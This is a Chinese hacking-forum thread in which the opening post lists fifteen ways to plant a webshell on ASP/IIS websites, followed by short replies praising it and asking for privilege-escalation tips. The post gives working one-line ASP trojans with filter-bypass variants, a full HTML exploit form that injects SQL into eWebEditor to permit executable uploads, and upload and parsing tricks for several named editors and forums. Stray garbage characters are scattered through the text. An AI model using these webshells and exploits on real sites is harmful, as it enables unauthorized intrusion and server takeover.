返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
  q0 k& v5 o  f: T
* W( z4 _6 }! Z$ w* x0 r2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp' z( I3 B2 R' m2 [2 A, w. t* _/ N

4 |4 x0 H: n( M- h1 h' f& e3.上传漏洞:6 t. f, u% O8 O0 {4 `
% O" a, \' H# y7 r7 Z) T
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x007 j, N) I8 ]* Z& B7 `# A& A" R
4 g0 y7 V, i# {
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
0 d8 I( E. G& d- T" j9 n$ D$ ~* c
+ b5 d, [& h7 b& U& l  W2 b雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
, u- x- L1 H3 O) d然后在上传文件里面填要传的图片格式的ASP木马
# D& N& [5 m- n& k/ s就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp4 H8 J/ Y! ?1 g. i6 x
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传; w" H3 Z* u" ?

- G6 W$ f( z. Y! t0 E) [<html>
" w+ i# p8 a$ j% W<head>) I3 X. A+ Z+ L1 S, e) |3 V8 J
<title>ewebeditor upload.asp上传利用</title># E( m' W& x8 X2 B. V& |
</head>
6 S4 c) l, S. e6 a: W* L% u5 R<body>
) \" Z$ c/ r; \9 h3 w9 M+ [0 d<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
: w% H& v/ b5 ^$ ]<input type=file name=uploadfile size=100><br><br>9 u, o+ h: k" [
<input type=submit value=Fuck>
8 q0 s9 l/ |9 b9 ^, h# l7 w' n. f7 ~</form>+ @4 f) w5 e, x9 U8 ]" |
</body>
1 l4 C/ `: j; r5 [' N</form>3 J7 O6 g3 x3 r9 g6 Y
</html>
' Y& x1 G- K( ^4 M; H1 C0 z$ S% E9 \* ?0 j6 Z  E$ M7 x7 C
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问0 y# W! C; l4 B+ I# M
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp- w- f5 J2 \2 G7 J

% P# H, `( y1 G3 H利用windows2003解析。建立zjq.asp的文件夹/ B' @7 r! U( S  o% l
) b: R1 m" n# l, F& X
6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型6 H  f4 m3 x/ |  }% u

8 w2 v+ B& I# c7.cuteeditor:类似ewebeditor( r9 I+ {6 e/ f; c& y" g
! K) |, ^- Q8 s) F
8.htmleditor:同上" h# x. r4 m4 \7 _% R+ B8 F' @9 |1 {
4 j0 V6 V! N2 M' S" L9 A  A& J
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
, P5 H) l5 u8 X  D
  ]4 g* ?9 K& z* |: J: p# |' w0 o<%execute request("value")%><%'<% loop <%:%>
/ g( _0 J% C. j3 N) z' c' |; [3 z- V( c, |' o6 J/ R' a! x
<%'<% loop <%:%><%execute request("value")%>
, p2 L. d3 T- T
4 n- B$ T/ u6 L<%execute request("value")'<% loop <%:%>
6 R8 m, J* b* m* `( f' n  z9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞, i6 y# N* h% e( \. a: a7 B
  S/ e. k3 X- M, _. D5 ?& z% A
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞
' W, b) Y  }+ y  ]9 w2 j+ |3 e9 F
" y7 W1 ^/ a3 n/ }$ J! p11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
1 [2 W2 H# H/ V" R) H& q1 r0 H
$ f+ z) A! ]6 I" P* {# F, E) a解析漏洞得到webshell
; v9 p+ Z: P8 o: I/ X' G! d
- I: X0 P! r. ?12.mssql差异备份,日志备份,前提需知道web路径
1 y" _+ y2 U  ?
; S: r: S% s9 X( Q13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
& t+ w6 H7 T# ^5 b8 A
* @) |+ u3 }- i  }' ?2 @14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
& d% _! k" g* I1 w3 T( [5 o7 G" m6 I& X+ O+ A
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
7 q! `; E, V! x/ c5 e/ _9 K3 a2 ^
! t' w- C7 d- ^3 U/ v- c, E以上只是本人的一些拙见,并不完善,以后想到了再继续添加
$ M2 b, r# R, D" ]+ N不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520
, `, u. }( m2 n
. o# Q  P) h7 h4 ?! D! R  _+ v  U. A  u) {$ b# }# p( q- \
很好啊、基本的入侵方法都包含了& i1 F- M% l) ^; C; ~5 a3 u, p

" T7 F8 N8 a; Z7 h3 |5 q/ X0 }最好来个提权的帖子再。
+ H+ s$ m- [+ h) t% d8 }, q$ ~$ o" @" V4 f
不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表